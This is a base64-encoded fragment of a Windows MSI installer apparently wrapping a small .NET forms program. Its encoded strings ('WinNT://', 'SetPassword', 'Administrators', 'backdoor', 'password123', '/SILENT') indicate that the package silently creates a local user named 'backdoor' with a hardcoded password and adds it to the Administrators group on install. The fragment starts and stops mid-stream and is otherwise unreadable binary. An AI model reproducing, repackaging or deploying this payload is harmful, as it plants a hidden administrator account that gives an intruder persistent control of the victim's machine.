ABwAAQAeAAEAGwABAAAAAAAdAAEAHgABACAAAQAdAAEADAABAAQAAQAMAAEACwABACYAAQAPAAEABAABAAsAAQA3AAEADgABAAcAAwAUAAEAFgABACsAAQBCAAUACQABAAsAAQAjAAEACAABAAoAAQAjAAEABAABAAYAAQAjAAEABAABAAYAAQAjAAEAEQABABMAAQAAAAAAFgABAAcAAQAmAAMABQACAAAAAAAEAAIABgACAAsAFQAFAAUAAQAsAAoAAQATAAIACwAGAAMAAgAIAAIACQACAAgAAgAGAAYABgAGAAYABgAGAAYABgAGACIAIgAiACkAKQApACoAKgAqACsAKwAvAC8ALwAvAC8ALwA1ADUANQA9AD0APQA9AD0ATQBNAE0ATQBNAE0ATQBNAFwAXABhAGEAYQBhAGEAYQBhAGEAbwBvAHIAcgByAHMAcwBzAHQAdAB3AHcAdwB3AHcAdwCCAIIAhgCGAIYAhgCGAIYAkACQAJAAkACQAJAAkAABgAKAA4AEgAWABoAHgAiACYAKgAGAAoADgAGAAoADgAGAAoADgAGAAoABgAKAA4AEgAWABoABgAKAA4ABgAKAA4AEgAWAAYACgAOABIAFgAaAB4AIgAGAAoABgAKAA4AEgAWABoAHgAiAAYACgAGAAoADgAGAAoADgAGAAoABgAKAA4AEgAWABoABgAKAAYACgAOABIAFgAaAAYACgAOABIAFgAaAB4ACAAUAEAASAA8AEQAOAA0ADAALACMAJQAnACMAJQAnACMAJQAnAAEALQAvADEANAA3ACUAOgA1AEkASwAjAAQAQABDAEYATQBPAFEACwBUAFYANAA3AF0AXwBhAF8AZABnAGkAawA3ACcAAQAtACMAJQAnACMAJQAnACUACwB4AHoAfAB+AIAAQACCAAcAhgCIAIoAAQAHAF8AkQCTAJUAawA3AJkAmwAgrSCtBI0EkQSR/50ClSCd/53/nUit/50ClUit/50ClUit/50ClUitAIlIrSadSI0Chf+dSJ1IrUid/49IrQKFSJ3/nQSRJq0mnUCf/58ClQKFSJ0ChSatSK1IrUiN/48EgUidFJ0ClQSBSK0AiUit/50ClUit/50Clf+t/48CpQSBQJ//nSCdSJ1IrQCPSK0Chf+P/58An0iNJq0UvRS9/70Eof+dSI0SAAIAGQABAAkAAgABAAEACQABAA4AAgAMAAEACwACABEBEQEAAPsA+wAAAAAAAAABAACAAgAAgAAAAAD8AA8BDAABAA8AAQAWAAEALQAEACwAAQAaAAEAGwABAAgAAQCRAM8A0QDSAN0A4QDjAOcA6QDqAOsA7QDuAO8A8ADxAPMA9AD2APgA+gD9ABEB0ADQANAA3gDiAOQA6ADoAOgA6ADoAOgA6ADoAPIAEAH1APcA+QD7AP4ACAABABsAAQABAAkAHAABAB4AAQAbAAEAHAABAB0AAQAeAAEAIAABAKgAqQABAAEABgABAAwAAQALAAEAJgABAA8AAQAEAAEACwABABQAAQAOAAEABwADACYAAwAWAAEAKwABAEIABQAGACIAKQAqACsALwA1AD0ATQBcAGEAbwByAHMAdAB3AIIAhgCQAAEABgABACMAAQARAAEAEwABABQAAQAWAAEA/v8AAAYBAgAAAAAAAAAAAAAAAAAAAAAAAQAAAALVzdWcLhsQk5cIACss+a4wAAAAUAAAAAMAAAABAAAAKAAAAAAAAIAwAAAADwAAADgAAAAAAAAAAAAAAAIAAACwBAAAEwAAAAkEAAAfAAAACAAAAFAAbwB3AGUAcgBVAHAAAABkR3VpZEEgc3RyaW5nIEdVSUQgdW5pcXVlIHRvIHRoaXMgY29tcG9uZW50LCB2ZXJzaW9uLCBhbmQgbGFuZ3VhZ2UuRGlyZWN0b3J5X0RpcmVjdG9yeVJlcXVpcmVkIGtleSBvZiBhIERpcmVjdG9yeSB0YWJsZSByZWNvcmQuIFRoaXMgaXMgYWN0dWFsbHkgYSBwcm9wZXJ0eSBuYW1lIHdob3NlIHZhbHVlIGNvbnRhaW5zIHRoZSBhY3R1YWwgcGF0aCwgc2V0IGVpdGhlciBieSB0aGUgQXBwU2VhcmNoIGFjdGlvbiBvciB3aXRoIHRoZSBkZWZhdWx0IHNldHRpbmcgb2J0YWluZWQgZnJvbSB0aGUgRGlyZWN0b3J5IHRhYmxlLkF0dHJpYnV0ZXNSZW1vdGUgZXhlY3V0aW9uIG9wdGlvbiwgb25lIG9mIGlyc0VudW1BIGNvbmRpdGlvbmFsIHN0YXRlbWVudCB0aGF0IHdpbGwgZGlzYWJsZSB0aGlzIGNvbXBvbmVudCBpZiB0aGUgc3BlY2lmaWVkIGNvbmRpdGlvbiBldmFsdWF0ZXMgdG8gdGhlICdUcnVlJyBzdGF0ZS4gSWYgYSBjb21wb25lbnQgaXMgZGlzYWJsZWQsIGl0IHdpbGwgbm90IGJlIGluc3RhbGxlZCwgcmVnYXJkbGVzcyBvZiB0aGUgJ0FjdGlvbicgc3RhdGUgYXNzb2NpYXRlZCB3aXRoIHRoZSBjb21wb25lbnQuS2V5UGF0aEZpbGU7UmVnaXN0cnk7T0RCQ0RhdGFTb3VyY2VFaXRoZXIgdGhlIHByaW1hcnkga2V5IGludG8gdGhlIEZpbGUgdGFibGUsIFJlZ2lzdHJ5IHRhYmxlLCBvciBPREJDRGF0YVNvdXJjZSB0YWJsZS4gVGhpcyBleHRyYWN0IHBhdGggaXMgc3RvcmVkIHdoZW4gdGhlIGNvbXBvbmVudCBpcyBpbnN0YWxsZWQsIGFuZCBpcyB1c2VkIHRvIGRldGVjdCB0aGUgcHJlc2VuY2Ugb2YgdGhlIGNvbXBvbmVudCBhbmQgdG8gcmV0dXJuIHRoZSBwYXRoIHRvIGl0LkN1c3RvbUFjdGlvblByaW1hcnkga2V5LCBuYW1lIG9mIGFjdGlvbiwgbm9ybWFsbHkgYXBwZWFycyBpbiBzZXF1ZW5jZSB0YWJsZSB1bmxlc3MgcHJpdmF0ZSB1c2UuVGhlIG51bWVyaWMgY3VzdG9tIGFjdGlvbiB0eXBlLCBjb25zaXN0aW5nIG9mIHNvdXJjZSBsb2NhdGlvbiwgY29kZSB0eXBlLCBlbnRyeSwgb3B0aW9uIGZsYWdzLlNvdXJjZUN1c3RvbVNvdXJjZVRoZSB0YWJsZSByZWZlcmVuY2Ugb2YgdGhlIHNvdXJjZSBvZiB0aGUgY29kZS5UYXJnZXRGb3JtYXR0ZWRFeGNlY3V0aW9uIHBhcmFtZXRlciwgZGVwZW5kcyBvbiB0aGUgdHlwZSBvZiBjdXN0b20gYWN0aW9uRXh0ZW5kZWRUeXBlQSBudW1lcmljIGN1c3RvbSBhY3Rpb24gdHlwZSB0aGF0IGV4dGVuZHMgY29kZSB0eXBlIG9yIG9wdGlvbiBmbGFncyBvZiB0aGUgVHlwZSBjb2x1bW4uVW5pcXVlIGlkZW50aWZpZXIgZm9yIGRpcmVjdG9yeSBlbnRyeSwgcHJpbWFyeSBrZXkuIElmIGEgcHJvcGVy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bXBvbmVudHMARGlzcG9zZQBJbml0aWFsaXplQ29tcG9uZW50AFRleHRCb3gAdXNlcm5hbWUATGFiZWwAbGFiZWwxAGxhYmVsMgBwYXNzd29yZABsYWJlbDMAZ3JvdXAAQnV0dG9uAGJ1dHRvbjEAZGVmYXVsdEluc3RhbmNlAGdldF9EZWZhdWx0AERlZmF1bHQATWFpbgBTeXN0ZW0uUmVzb3VyY2VzAFJlc291cmNlTWFuYWdlcgByZXNvdXJjZU1hbgBTeXN0ZW0uR2xvYmFsaXphdGlvbgBDdWx0dXJlSW5mbwByZXNvdXJjZUN1bHR1cmUAZ2V0X1Jlc291cmNlTWFuYWdlcgBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQBDdWx0dXJlAHNlbmRlcgBlAGRpc3Bvc2luZwB2YWx1ZQBTeXN0ZW0uUmVmbGVjdGlvbgBBc3NlbWJseVRpdGxlQXR0cmlidXRlAEFzc2VtYmx5RGVzY3JpcHRpb25BdHRyaWJ1dGUAQXNzZW1ibHlDb25maWd1cmF0aW9uQXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBBc3NlbWJseVByb2R1Y3RBdHRyaWJ1dGUAQXNzZW1ibHlDb3B5cmlnaHRBdHRyaWJ1dGUAQXNzZW1ibHlUcmFkZW1hcmtBdHRyaWJ1dGUAQXNzZW1ibHlDdWx0dXJlQXR0cmlidXRlAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBDb21WaXNpYmxlQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAQXNzZW1ibHlWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5RmlsZVZlcnNpb25BdHRyaWJ1dGUAU3lzdGVtLkRpYWdub3N0aWNzAERlYnVnZ2FibGVBdHRyaWJ1dGUARGVidWdnaW5nTW9kZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlAEVudmlyb25tZW50AGdldF9NYWNoaW5lTmFtZQBTdHJpbmcAQ29uY2F0AFN5c3RlbS5EaXJlY3RvcnlTZXJ2aWNlcwBEaXJlY3RvcnlFbnRyeQBEaXJlY3RvcnlFbnRyaWVzAGdldF9DaGlsZHJlbgBDb250cm9sAGdldF9UZXh0AEFkZABJbnZva2UAQ29tbWl0Q2hhbmdlcwBGaW5kAGdldF9QYXRoAFRvU3RyaW5nAEFwcGxpY2F0aW9uAEV4aXQASURpc3Bvc2FibGUAU3VzcGVuZExheW91dABTeXN0ZW0uRHJhd2luZwBQb2ludABzZXRfTG9jYXRpb24Ac2V0X05hbWUAU2l6ZQBzZXRfU2l6ZQBzZXRfVGFiSW5kZXgAc2V0X1RleHQAc2V0X0F1dG9TaXplAEV2ZW50SGFuZGxlcgBhZGRfQ2xpY2sAYWRkX1RleHRDaGFuZ2VkAEJ1dHRvbkJhc2UAc2V0X1VzZVZpc3VhbFN0eWxlQmFja0NvbG9yAFNpemVGAENvbnRhaW5lckNvbnRyb2wAc2V0X0F1dG9TY2FsZURpbWVuc2lvbnMAQXV0b1NjYWxlTW9kZQBzZXRfQXV0b1NjYWxlTW9kZQBzZXRfQ2xpZW50U2l6ZQBDb250cm9sQ29sbGVjdGlvbgBnZXRfQ29udHJvbHMAYWRkX0xvYWQAUmVzdW1lTGF5b3V0AFBlcmZvcm1MYXlvdXQAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQAuY2N0b3IAU2V0dGluZ3NCYXNlAFN5bmNocm9uaXplZABTVEFUaHJlYWRBdHRyaWJ1dGUARW5hYmxlVmlzdWFsU3R5bGVzAFNldENvbXBhdGlibGVUZXh0UmVuZGVyaW5nRGVmYXVsdABSdW4ARGVidWdnZXJOb25Vc2VyQ29kZUF0dHJpYnV0ZQBUeXBlAFJ1bnRpbWVUeXBlSGFuZGxlAEdldFR5cGVGcm9tSGFuZGxlAEFzc2VtYmx5AGdldF9Bc3NlbWJseQBFZGl0b3JCcm93c2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlU3RhdGUAV2luZG93c0Zvcm1zQXBwbGljYXRpb24xLkZvcm0xLnJlc291cmNlcwBXaW5kb3dzRm9ybXNBcHBsaWNhdGlvbjEuUHJvcGVydGllcy5SZXNvdXJjZXMucmVzb3VyY2VzAAARVwBpAG4ATgBU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ZGF0ZUluc3RhbGxJbml0aWFsaXplSW5zdGFsbEFkbWluUGFja2FnZUluc3RhbGxGaWxlc0luc3RhbGxGaW5hbGl6ZUV4ZWN1dGVBY3Rpb25QdWJsaXNoRmVhdHVyZXNQdWJsaXNoUHJvZHVjdGJ6LldyYXBwZWRTZXR1cFByb2dyYW1iei5DdXN0b21BY3Rpb25EbGxiei5Qcm9kdWN0Q29tcG9uZW50e0VERTEwRjZDLTMwRjQtNDJDQS1CNUM3LUFEQjkwNUU0NUJGQ31CWi5JTlNUQUxMRk9MREVScmVnOUNBRTU3QUY3QjlGQjRFRjI3MDZGOTVCNEI4M0I0MTlTZXRQcm9wZXJ0eUZvckRlZmVycmVkYnouTW9kaWZ5UmVnaXN0cnlbQlouV1JBUFBFRF9BUFBJRF1iei5TdWJzdFdyYXBwZWRBcmd1bWVudHNfU3Vic3RXcmFwcGVkQXJndW1lbnRzQDRiei5SdW5XcmFwcGVkU2V0dXBbYnouU2V0dXBTaXplXSAiW1NvdXJjZURpcl1cLiIgW0JaLklOU1RBTExfU1VDQ0VTU19DT0RFU10gKltCWi5GSVhFRF9JTlNUQUxMX0FSR1VNRU5UU11bV1JBUFBFRF9BUkdVTUVOVFNdX01vZGlmeVJlZ2lzdHJ5QDRiei5Vbmluc3RhbGxXcmFwcGVkX1VuaW5zdGFsbFdyYXBwZWRANFByb2dyYW1GaWxlc0ZvbGRlcmJ4anZpbHc3fFtCWi5DT01QQU5ZTkFNRV1UQVJHRVRESVIuU291cmNlRGlyUHJvZHVjdEZlYXR1cmVNYWluIEZlYXR1cmVQcm9kdWN0SWNvbkZpbmRSZWxhdGVkUHJvZHVjdHNMYXVuY2hDb25kaXRpb25zVmFsaWRhdGVQcm9kdWN0SURNaWdyYXRlRmVhdHVyZVN0YXRlc1Byb2Nlc3NDb21wb25lbnRzVW5wdWJsaXNoRmVhdHVyZXNSZW1vdmVSZWdpc3RyeVZhbHVlc1dyaXRlUmVnaXN0cnlWYWx1ZXNSZWdpc3RlclVzZXJSZWdpc3RlclByb2R1Y3RSZW1vdmVFeGlzdGluZ1Byb2R1Y3RzTk9UIFJFTU9WRSB+PSJBTEwiIEFORCBOT1QgVVBHUkFERVBST0RVQ1RDT0RFUkVNT1ZFIH49ICJBTEwiIEFORCBOT1QgVVBHUkFESU5HUFJPRFVDVENPREVOT1QgV0lYX0RPV05HUkFERV9ERVRFQ1RFRERvd25ncmFkZXMgYXJlIG5vdCBhbGxvd2VkLkFMTFVTRVJTMUFSUE5PUkVQQUlSQVJQTk9NT0RJRllBUlBQUk9EVUNUSUNPTkFSUEhFTFBMSU5LaHR0cDovL3d3dy5leGVtc2kuY29tQVJQVVJMSU5GT0FCT1VUQVJQQ09NTUVOVFNNU0kgVGVtcGxhdGUuQVJQQ09OVEFDVE15IGNvbnRhY3QgaW5mb3JtYXRpb24uQVJQVVJMVVBEQVRFSU5GT015IHVwZGF0ZSBpbmZvcm1hdGlvbi5CWi5WRVJGQlouV1JBUFBFRF9BUFBJRHs1NjYyODkxMi04RUQ0LTQ4RUYtQUM1Mi1FRTgzQTFCRkJGMTF9X2lzMUJaLkNPTVBBTllOQU1FRVhFTVNJLkNPTUJaLklOU1RBTExfU1VDQ0VTU19DT0RFUzBCWi5GSVhFRF9JTlNUQUxMX0FSR1VNRU5UUy9TSUxFTlQgQlouVUlOT05FX0lOU1RBTExfQVJHVU1FTlRTIEJaLlVJQkFTSUNfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUZVTExfSU5TVEFMTF9BUkdVTUVOVFNCWi5GSVhFRF9VTklOU1RBTExfQVJHVU1FTlRTQlouVUlOT05FX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSUJBU0lDX1VOSU5TVEFMTF9BUkdVTUVOVFNCWi5VSVJFRFVDRURfVU5JTlNUQUxMX0FSR1VNRU5UU0JaLlVJRlVMTF9VTklOU1RBTExfQVJHVU1FTlRTYnouU2V0dXBTaXplMjMyOTYwTWFudWZhY3R1cmVyUHJvZHVjdENvZGV7MjcxQkJDRUQtRjM2QS00RThFLUE1NzYtOTQ1NUYwQ0EwMUE4fVByb2R1Y3RMYW5ndWFnZTEwMzNQcm9kdWN0TmFtZU1TSSBXcmFwcGVyIFRlbXBsYXRlUHJvZHVjdFZlcnNpb24xLjAuMC4we0NDMDM1QzE4LTBGQzctNDcwOC04ODA2LUQ0QjA5MUU1OUFBN31TZWN1cmVDdXN0b21Qcm9wZXJ0aWVzV0lYX0RPV05HUkFERV9ERV